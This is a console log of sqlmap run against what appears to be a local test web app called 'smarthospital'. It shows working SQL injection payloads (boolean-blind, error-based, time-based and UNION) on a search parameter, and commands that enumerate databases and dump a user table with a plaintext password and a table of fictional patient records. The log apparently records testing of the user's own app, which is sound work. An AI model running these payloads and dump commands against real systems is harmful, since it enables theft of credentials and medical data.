
(keras_env) C:\Users\940167>D:

(keras_env) D:\>cd D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap

(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>python sqlmap.py -r .\request.txt --threads=6 -dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.3.15#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:48:14 /2024-04-17/

[23:48:14] [INFO] parsing HTTP request from '.\request.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:48:16] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:48:16] [INFO] resuming back-end DBMS 'mysql'
[23:48:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://127.0.0.1:5000/search?q=' AND 5213=5213#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://127.0.0.1:5000/search?q=' AND GTID_SUBSET(CONCAT(0x71716a6a71,(SELECT (ELT(8011=8011,1))),0x717a6b7671),8011)-- vlsK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:5000/search?q=' AND (SELECT 8750 FROM (SELECT(SLEEP(5)))UgQs)-- WzAH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://127.0.0.1:5000/search?q=' UNION ALL SELECT NULL,CONCAT(0x71716a6a71,0x4e5575704471526355576c775146537574534e736959665a6b486d504e4a534a4a4c59546452654b,0x717a6b7671),NULL,NULL,NULL,NULL,NULL#
---
[23:48:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[23:48:17] [INFO] fetching database names
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] smarthospital
[*] sys
[*] world

[23:48:17] [INFO] fetched data logged to text files under 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 23:48:17 /2024-04-17/


(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>python sqlmap.py -r .\request.txt --threads=6 -tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.3.15#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:48:31 /2024-04-17/

[23:48:31] [INFO] parsing HTTP request from '.\request.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:48:33] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:48:33] [INFO] resuming back-end DBMS 'mysql'
[23:48:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://127.0.0.1:5000/search?q=' AND 5213=5213#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://127.0.0.1:5000/search?q=' AND GTID_SUBSET(CONCAT(0x71716a6a71,(SELECT (ELT(8011=8011,1))),0x717a6b7671),8011)-- vlsK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:5000/search?q=' AND (SELECT 8750 FROM (SELECT(SLEEP(5)))UgQs)-- WzAH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://127.0.0.1:5000/search?q=' UNION ALL SELECT NULL,CONCAT(0x71716a6a71,0x4e5575704471526355576c775146537574534e736959665a6b486d504e4a534a4a4c59546452654b,0x717a6b7671),NULL,NULL,NULL,NULL,NULL#
---
[23:48:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[23:48:33] [INFO] fetching database names
[23:48:33] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, sakila, smarthospital, sys, world'
Database: information_schema
[79 tables]
+------------------------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS                    |
| APPLICABLE_ROLES                                     |
| CHARACTER_SETS                                       |
| CHECK_CONSTRAINTS                                    |
| COLLATIONS                                           |
| COLLATION_CHARACTER_SET_APPLICABILITY                |
| COLUMNS_EXTENSIONS                                   |
| COLUMN_PRIVILEGES                                    |
| COLUMN_STATISTICS                                    |
| ENABLED_ROLES                                        |
| FILES                                                |
| INNODB_BUFFER_PAGE                                   |
| INNODB_BUFFER_PAGE_LRU                               |
| INNODB_BUFFER_POOL_STATS                             |
| INNODB_CACHED_INDEXES                                |
| INNODB_CMP                                           |
| INNODB_CMPMEM                                        |
| INNODB_CMPMEM_RESET                                  |
| INNODB_CMP_PER_INDEX                                 |
| INNODB_CMP_PER_INDEX_RESET                           |
| INNODB_CMP_RESET                                     |
| INNODB_COLUMNS                                       |
| INNODB_DATAFILES                                     |
| INNODB_FIELDS                                        |
| INNODB_FOREIGN                                       |
| INNODB_FOREIGN_COLS                                  |
| INNODB_FT_BEING_DELETED                              |
| INNODB_FT_CONFIG                                     |
| INNODB_FT_DEFAULT_STOPWORD                           |
| INNODB_FT_DELETED                                    |
| INNODB_FT_INDEX_CACHE                                |
| INNODB_FT_INDEX_TABLE                                |
| INNODB_INDEXES                                       |
| INNODB_METRICS                                       |
| INNODB_SESSION_TEMP_TABLESPACES                      |
| INNODB_TABLES                                        |
| INNODB_TABLESPACES                                   |
| INNODB_TABLESPACES_BRIEF                             |
| INNODB_TABLESTATS                                    |
| INNODB_TEMP_TABLE_INFO                               |
| INNODB_TRX                                           |
| INNODB_VIRTUAL                                       |
| KEYWORDS                                             |
| KEY_COLUMN_USAGE                                     |
| OPTIMIZER_TRACE                                      |
| PARAMETERS                                           |
| PROFILING                                            |
| REFERENTIAL_CONSTRAINTS                              |
| RESOURCE_GROUPS                                      |
| ROLE_COLUMN_GRANTS                                   |
| ROLE_ROUTINE_GRANTS                                  |
| ROLE_TABLE_GRANTS                                    |
| ROUTINES                                             |
| SCHEMATA                                             |
| SCHEMATA_EXTENSIONS                                  |
| SCHEMA_PRIVILEGES                                    |
| STATISTICS                                           |
| ST_GEOMETRY_COLUMNS                                  |
| ST_SPATIAL_REFERENCE_SYSTEMS                         |
| ST_UNITS_OF_MEASURE                                  |
| TABLESPACES                                          |
| TABLESPACES_EXTENSIONS                               |
| TABLES_EXTENSIONS                                    |
| TABLE_CONSTRAINTS                                    |
| TABLE_CONSTRAINTS_EXTENSIONS                         |
| TABLE_PRIVILEGES                                     |
| USER_ATTRIBUTES                                      |
| USER_PRIVILEGES                                      |
| VIEWS                                                |
| VIEW_ROUTINE_USAGE                                   |
| VIEW_TABLE_USAGE                                     |
| COLUMNS                                              |
| ENGINES                                              |
| EVENTS                                               |
| PARTITIONS                                           |
| PLUGINS                                              |
| PROCESSLIST                                          |
| TABLES                                               |
| TRIGGERS                                             |
+------------------------------------------------------+

Database: mysql
[38 tables]
+------------------------------------------------------+
| component                                            |
| plugin                                               |
| user                                                 |
| columns_priv                                         |
| db                                                   |
| default_roles                                        |
| engine_cost                                          |
| func                                                 |
| general_log                                          |
| global_grants                                        |
| gtid_executed                                        |
| help_category                                        |
| help_keyword                                         |
| help_relation                                        |
| help_topic                                           |
| innodb_index_stats                                   |
| innodb_table_stats                                   |
| ndb_binlog_index                                     |
| password_history                                     |
| procs_priv                                           |
| proxies_priv                                         |
| replication_asynchronous_connection_failover         |
| replication_asynchronous_connection_failover_managed |
| replication_group_configuration_version              |
| replication_group_member_actions                     |
| role_edges                                           |
| server_cost                                          |
| servers                                              |
| slave_master_info                                    |
| slave_relay_log_info                                 |
| slave_worker_info                                    |
| slow_log                                             |
| tables_priv                                          |
| time_zone                                            |
| time_zone_leap_second                                |
| time_zone_name                                       |
| time_zone_transition                                 |
| time_zone_transition_type                            |
+------------------------------------------------------+

Database: performance_schema
[111 tables]
+------------------------------------------------------+
| hosts                                                |
| processlist                                          |
| accounts                                             |
| binary_log_transaction_compression_stats             |
| cond_instances                                       |
| data_lock_waits                                      |
| data_locks                                           |
| error_log                                            |
| events_errors_summary_by_account_by_error            |
| events_errors_summary_by_host_by_error               |
| events_errors_summary_by_thread_by_error             |
| events_errors_summary_by_user_by_error               |
| events_errors_summary_global_by_error                |
| events_stages_current                                |
| events_stages_history                                |
| events_stages_history_long                           |
| events_stages_summary_by_account_by_event_name       |
| events_stages_summary_by_host_by_event_name          |
| events_stages_summary_by_thread_by_event_name        |
| events_stages_summary_by_user_by_event_name          |
| events_stages_summary_global_by_event_name           |
| events_statements_current                            |
| events_statements_histogram_by_digest                |
| events_statements_histogram_global                   |
| events_statements_history                            |
| events_statements_history_long                       |
| events_statements_summary_by_account_by_event_name   |
| events_statements_summary_by_digest                  |
| events_statements_summary_by_host_by_event_name      |
| events_statements_summary_by_program                 |
| events_statements_summary_by_thread_by_event_name    |
| events_statements_summary_by_user_by_event_name      |
| events_statements_summary_global_by_event_name       |
| events_transactions_current                          |
| events_transactions_history                          |
| events_transactions_history_long                     |
| events_transactions_summary_by_account_by_event_name |
| events_transactions_summary_by_host_by_event_name    |
| events_transactions_summary_by_thread_by_event_name  |
| events_transactions_summary_by_user_by_event_name    |
| events_transactions_summary_global_by_event_name     |
| events_waits_current                                 |
| events_waits_history                                 |
| events_waits_history_long                            |
| events_waits_summary_by_account_by_event_name        |
| events_waits_summary_by_host_by_event_name           |
| events_waits_summary_by_instance                     |
| events_waits_summary_by_thread_by_event_name         |
| events_waits_summary_by_user_by_event_name           |
| events_waits_summary_global_by_event_name            |
| file_instances                                       |
| file_summary_by_event_name                           |
| file_summary_by_instance                             |
| global_status                                        |
| global_variables                                     |
| host_cache                                           |
| innodb_redo_log_files                                |
| keyring_component_status                             |
| keyring_keys                                         |
| log_status                                           |
| memory_summary_by_account_by_event_name              |
| memory_summary_by_host_by_event_name                 |
| memory_summary_by_thread_by_event_name               |
| memory_summary_by_user_by_event_name                 |
| memory_summary_global_by_event_name                  |
| metadata_locks                                       |
| mutex_instances                                      |
| objects_summary_global_by_type                       |
| performance_timers                                   |
| persisted_variables                                  |
| prepared_statements_instances                        |
| replication_applier_configuration                    |
| replication_applier_filters                          |
| replication_applier_global_filters                   |
| replication_applier_status                           |
| replication_applier_status_by_coordinator            |
| replication_applier_status_by_worker                 |
| replication_asynchronous_connection_failover         |
| replication_asynchronous_connection_failover_managed |
| replication_connection_configuration                 |
| replication_connection_status                        |
| replication_group_member_stats                       |
| replication_group_members                            |
| rwlock_instances                                     |
| session_account_connect_attrs                        |
| session_connect_attrs                                |
| session_status                                       |
| session_variables                                    |
| setup_actors                                         |
| setup_consumers                                      |
| setup_instruments                                    |
| setup_objects                                        |
| setup_threads                                        |
| socket_instances                                     |
| socket_summary_by_event_name                         |
| socket_summary_by_instance                           |
| status_by_account                                    |
| status_by_host                                       |
| status_by_thread                                     |
| status_by_user                                       |
| table_handles                                        |
| table_io_waits_summary_by_index_usage                |
| table_io_waits_summary_by_table                      |
| table_lock_waits_summary_by_table                    |
| threads                                              |
| tls_channel_status                                   |
| user_defined_functions                               |
| user_variables_by_thread                             |
| users                                                |
| variables_by_thread                                  |
| variables_info                                       |
+------------------------------------------------------+

Database: sakila
[23 tables]
+------------------------------------------------------+
| language                                             |
| actor                                                |
| actor_info                                           |
| address                                              |
| category                                             |
| city                                                 |
| country                                              |
| customer                                             |
| customer_list                                        |
| film                                                 |
| film_actor                                           |
| film_category                                        |
| film_list                                            |
| film_text                                            |
| inventory                                            |
| nicer_but_slower_film_list                           |
| payment                                              |
| rental                                               |
| sales_by_film_category                               |
| sales_by_store                                       |
| staff                                                |
| staff_list                                           |
| store                                                |
+------------------------------------------------------+

Database: smarthospital
[2 tables]
+------------------------------------------------------+
| user                                                 |
| medicalcase                                          |
+------------------------------------------------------+

Database: sys
[101 tables]
+------------------------------------------------------+
| processlist                                          |
| session                                              |
| version                                              |
| host_summary                                         |
| host_summary_by_file_io                              |
| host_summary_by_file_io_type                         |
| host_summary_by_stages                               |
| host_summary_by_statement_latency                    |
| host_summary_by_statement_type                       |
| innodb_buffer_stats_by_schema                        |
| innodb_buffer_stats_by_table                         |
| innodb_lock_waits                                    |
| io_by_thread_by_latency                              |
| io_global_by_file_by_bytes                           |
| io_global_by_file_by_latency                         |
| io_global_by_wait_by_bytes                           |
| io_global_by_wait_by_latency                         |
| latest_file_io                                       |
| memory_by_host_by_current_bytes                      |
| memory_by_thread_by_current_bytes                    |
| memory_by_user_by_current_bytes                      |
| memory_global_by_current_bytes                       |
| memory_global_total                                  |
| metrics                                              |
| ps_check_lost_instrumentation                        |
| schema_auto_increment_columns                        |
| schema_index_statistics                              |
| schema_object_overview                               |
| schema_redundant_indexes                             |
| schema_table_lock_waits                              |
| schema_table_statistics                              |
| schema_table_statistics_with_buffer                  |
| schema_tables_with_full_table_scans                  |
| schema_unused_indexes                                |
| session_ssl_status                                   |
| statement_analysis                                   |
| statements_with_errors_or_warnings                   |
| statements_with_full_table_scans                     |
| statements_with_runtimes_in_95th_percentile          |
| statements_with_sorting                              |
| statements_with_temp_tables                          |
| sys_config                                           |
| user_summary                                         |
| user_summary_by_file_io                              |
| user_summary_by_file_io_type                         |
| user_summary_by_stages                               |
| user_summary_by_statement_latency                    |
| user_summary_by_statement_type                       |
| wait_classes_global_by_avg_latency                   |
| wait_classes_global_by_latency                       |
| waits_by_host_by_latency                             |
| waits_by_user_by_latency                             |
| waits_global_by_latency                              |
| x$host_summary                                       |
| x$host_summary_by_file_io                            |
| x$host_summary_by_file_io_type                       |
| x$host_summary_by_stages                             |
| x$host_summary_by_statement_latency                  |
| x$host_summary_by_statement_type                     |
| x$innodb_buffer_stats_by_schema                      |
| x$innodb_buffer_stats_by_table                       |
| x$innodb_lock_waits                                  |
| x$io_by_thread_by_latency                            |
| x$io_global_by_file_by_bytes                         |
| x$io_global_by_file_by_latency                       |
| x$io_global_by_wait_by_bytes                         |
| x$io_global_by_wait_by_latency                       |
| x$latest_file_io                                     |
| x$memory_by_host_by_current_bytes                    |
| x$memory_by_thread_by_current_bytes                  |
| x$memory_by_user_by_current_bytes                    |
| x$memory_global_by_current_bytes                     |
| x$memory_global_total                                |
| x$processlist                                        |
| x$ps_digest_95th_percentile_by_avg_us                |
| x$ps_digest_avg_latency_distribution                 |
| x$ps_schema_table_statistics_io                      |
| x$schema_flattened_keys                              |
| x$schema_index_statistics                            |
| x$schema_table_lock_waits                            |
| x$schema_table_statistics                            |
| x$schema_table_statistics_with_buffer                |
| x$schema_tables_with_full_table_scans                |
| x$session                                            |
| x$statement_analysis                                 |
| x$statements_with_errors_or_warnings                 |
| x$statements_with_full_table_scans                   |
| x$statements_with_runtimes_in_95th_percentile        |
| x$statements_with_sorting                            |
| x$statements_with_temp_tables                        |
| x$user_summary                                       |
| x$user_summary_by_file_io                            |
| x$user_summary_by_file_io_type                       |
| x$user_summary_by_stages                             |
| x$user_summary_by_statement_latency                  |
| x$user_summary_by_statement_type                     |
| x$wait_classes_global_by_avg_latency                 |
| x$wait_classes_global_by_latency                     |
| x$waits_by_host_by_latency                           |
| x$waits_by_user_by_latency                           |
| x$waits_global_by_latency                            |
+------------------------------------------------------+

Database: world
[3 tables]
+------------------------------------------------------+
| city                                                 |
| country                                              |
| countrylanguage                                      |
+------------------------------------------------------+

[23:48:34] [INFO] fetched data logged to text files under 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 23:48:34 /2024-04-17/


(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>python sqlmap.py -r .\request.txt --threads=6 -T user --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.3.15#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:49:06 /2024-04-17/

[23:49:06] [INFO] parsing HTTP request from '.\request.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:49:09] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:49:09] [INFO] resuming back-end DBMS 'mysql'
[23:49:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://127.0.0.1:5000/search?q=' AND 5213=5213#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://127.0.0.1:5000/search?q=' AND GTID_SUBSET(CONCAT(0x71716a6a71,(SELECT (ELT(8011=8011,1))),0x717a6b7671),8011)-- vlsK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:5000/search?q=' AND (SELECT 8750 FROM (SELECT(SLEEP(5)))UgQs)-- WzAH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://127.0.0.1:5000/search?q=' UNION ALL SELECT NULL,CONCAT(0x71716a6a71,0x4e5575704471526355576c775146537574534e736959665a6b486d504e4a534a4a4c59546452654b,0x717a6b7671),NULL,NULL,NULL,NULL,NULL#
---
[23:49:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[23:49:10] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:49:10] [INFO] fetching current database
[23:49:10] [INFO] fetching columns for table 'user' in database 'smarthospital'
[23:49:10] [INFO] fetching entries for table 'user' in database 'smarthospital'
Database: smarthospital
Table: user
[1 entry]
+----+----------------+-------+----------+----------+------------+--------------+------------------+
| id | email          | token | password | username | block_time | failed_times | token_start_time |
+----+----------------+-------+----------+----------+------------+--------------+------------------+
| 1  | puja@gmail.com | puja  | puja     | <blank>  | 0          | 0            | <blank>          |
+----+----------------+-------+----------+----------+------------+--------------+------------------+

[23:49:10] [INFO] table 'smarthospital.`user`' dumped to CSV file 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1\dump\smarthospital\user.csv'
[23:49:10] [INFO] fetched data logged to text files under 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 23:49:10 /2024-04-17/


(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>python sqlmap.py -r .\request.txt --threads=6 -T user --medicalcase
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.3.15#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: sqlmap.py [options]

sqlmap.py: error: no such option: --medicalcase

Press Enter to continue...

(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>python sqlmap.py -r .\request.txt --threads=6 -T medicalcase --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.3.15#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:49:48 /2024-04-17/

[23:49:48] [INFO] parsing HTTP request from '.\request.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:49:50] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:49:50] [INFO] resuming back-end DBMS 'mysql'
[23:49:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://127.0.0.1:5000/search?q=' AND 5213=5213#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://127.0.0.1:5000/search?q=' AND GTID_SUBSET(CONCAT(0x71716a6a71,(SELECT (ELT(8011=8011,1))),0x717a6b7671),8011)-- vlsK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:5000/search?q=' AND (SELECT 8750 FROM (SELECT(SLEEP(5)))UgQs)-- WzAH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://127.0.0.1:5000/search?q=' UNION ALL SELECT NULL,CONCAT(0x71716a6a71,0x4e5575704471526355576c775146537574534e736959665a6b486d504e4a534a4a4c59546452654b,0x717a6b7671),NULL,NULL,NULL,NULL,NULL#
---
[23:49:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[23:49:51] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:49:51] [INFO] fetching current database
[23:49:51] [INFO] fetching columns for table 'medicalcase' in database 'smarthospital'
[23:49:51] [INFO] fetching entries for table 'medicalcase' in database 'smarthospital'
Database: smarthospital
Table: medicalcase
[3 entries]
+----+-----+--------+--------+--------------+-----------------------+-------------+
| id | age | doctor | gender | illness      | diagnosis             | patientname |
+----+-----+--------+--------+--------------+-----------------------+-------------+
| 1  | 39  | albus  | male   | common cold  | high body temperature | ron         |
| 2  | 33  | albus  | male   | hypertension | high blood pressure   | harry       |
| 3  | 36  | albus  | female | dizziness    | high cholesterol      | hermione    |
+----+-----+--------+--------+--------------+-----------------------+-------------+

[23:49:51] [INFO] table 'smarthospital.medicalcase' dumped to CSV file 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1\dump\smarthospital\medicalcase.csv'
[23:49:51] [INFO] fetched data logged to text files under 'C:\Users\940167\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 23:49:51 /2024-04-17/


(keras_env) D:\DATA\Downloads\sqlmapproject-sqlmap\sqlmapproject-sqlmap>